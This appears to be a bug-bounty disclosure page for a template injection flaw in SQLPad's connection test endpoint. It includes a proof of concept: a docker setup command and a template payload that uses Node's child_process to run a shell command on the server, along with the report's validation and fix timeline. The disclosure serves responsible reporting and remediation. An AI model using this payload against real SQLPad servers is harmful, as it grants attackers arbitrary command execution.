Template injection in connection test endpoint leads to RCE in sqlpad/sqlpad

Valid

Reported on

Mar 11th 2022


Description

Please enter a description of the vulnerability.

Proof of Concept

  • Run a local docker instance
sudo docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:latest
  • Navigate to http://localhost:3000/
  • Click on Connections->Add connection
  • Choose MySQL as the driver
  • Input the following payload into the Database form field
{{ process.mainModule.require('child_process').exec('id>/tmp/pwn') }}
  • Execute the following command to confirm the /tmp/pwn file was created in the container filesystem
sudo docker exec -it sqlpad cat /tmp/pwn

Impact

An SQLPad web application user with admin rights is able to run arbitrary commands in the underlying server.

We are processing your report and will contact the sqlpad team within 24 hours. 3 months ago
We have contacted a member of the sqlpad team and are waiting to hear back 2 months ago
sqlpad/sqlpad maintainer validated this vulnerability 2 months ago
Daniel Santos has been awarded the disclosure bounty
The fix bounty is now up for grabs
Daniel Santos
2 months ago

Researcher


Please donate the bounty to a charity of your choice.

sqlpad/sqlpad maintainer confirmed that a fix has been merged on 3f92be 2 months ago
The fix bounty has been dropped
render-connection.js#L23 has been validated
to join this conversation